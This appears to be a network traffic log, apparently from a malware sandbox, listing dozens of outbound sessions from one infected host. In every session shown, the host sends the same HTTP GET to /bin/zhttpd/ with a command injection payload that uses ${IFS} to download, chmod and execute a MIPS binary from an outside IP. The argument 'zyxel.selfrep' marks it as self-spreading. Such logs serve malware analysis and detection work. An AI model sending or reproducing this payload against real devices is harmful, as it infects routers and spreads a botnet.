                                              Jan 29, 2024 07:03:54.095958948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5447192.168.2.1452628212.198.162.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095989943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5448192.168.2.144604260.82.128.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096033096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5449192.168.2.1456758155.169.91.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096077919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5450192.168.2.1444962142.150.127.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096106052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5451192.168.2.1453772221.228.167.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096149921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5452192.168.2.1434684100.160.118.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096204042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5453192.168.2.1453696147.115.224.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096234083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5454192.168.2.1437734131.137.240.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096288919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5455192.168.2.1455202194.87.40.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096311092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5456192.168.2.1453558216.202.181.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096348047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5457192.168.2.1457166218.63.163.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096400023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5458192.168.2.144217032.243.179.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096436977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5459192.168.2.1456346147.143.231.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096481085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5460192.168.2.14423262.135.113.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096523046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5461192.168.2.1439780185.178.186.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096563101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5462192.168.2.144509827.242.134.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096621990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5463192.168.2.1440364197.93.48.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096642017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5464192.168.2.145427896.25.14.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096677065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5465192.168.2.1434336114.108.230.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096709013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5466192.168.2.145633250.150.22.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096751928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5467192.168.2.1437946182.120.199.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096781969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5468192.168.2.1436912108.102.41.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096828938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5469192.168.2.1447722179.96.13.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096883059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5470192.168.2.144014038.156.244.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096913099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5471192.168.2.1437758196.224.239.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.096945047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5472192.168.2.1444962205.168.111.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097009897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5473192.168.2.1450068176.20.96.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097037077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5474192.168.2.1433466145.1.200.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097068071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5475192.168.2.1455754153.190.160.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097106934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5476192.168.2.1455146104.84.208.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097146988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5477192.168.2.1451380198.50.84.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097209930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5478192.168.2.1434344184.153.145.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097243071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5479192.168.2.1439830217.247.217.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097281933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5480192.168.2.1460112138.58.71.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097307920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5481192.168.2.1454710198.163.104.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097342968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5482192.168.2.1454358119.115.140.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097362995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5483192.168.2.1443044198.75.184.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097424030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5484192.168.2.1454006147.243.121.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097461939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5485192.168.2.145169670.24.126.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097487926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5486192.168.2.1433156126.63.61.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097517014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5487192.168.2.1435758161.241.45.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097562075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5488192.168.2.1451498196.23.29.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097587109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5489192.168.2.145897447.211.133.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097642899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5490192.168.2.1450842181.64.194.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097681999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5491192.168.2.145178427.157.226.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097713947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5492192.168.2.1454456118.170.129.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097754002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5493192.168.2.1436262128.10.143.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097774982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5494192.168.2.144096212.186.122.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097815990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5495192.168.2.146039069.57.158.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097858906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5496192.168.2.1450838195.156.10.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097909927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5497192.168.2.1436012177.70.246.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097958088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5498192.168.2.144442040.87.165.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.097989082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5499192.168.2.143910681.35.48.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098040104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5500192.168.2.14521901.120.177.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098073006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5501192.168.2.1435288168.185.182.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098110914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5502192.168.2.144751088.141.13.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098166943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5503192.168.2.143837627.117.142.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098196030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5504192.168.2.1446508175.9.236.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098242044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5505192.168.2.145609274.9.134.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098269939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5506192.168.2.1444594135.17.106.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098313093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5507192.168.2.1434828135.56.101.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098360062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5508192.168.2.145151874.223.113.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098412037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5509192.168.2.1452048131.54.160.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.098438978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5510192.168.2.143925027.71.130.59443
                                              TimestampBytes transferredDirectionData
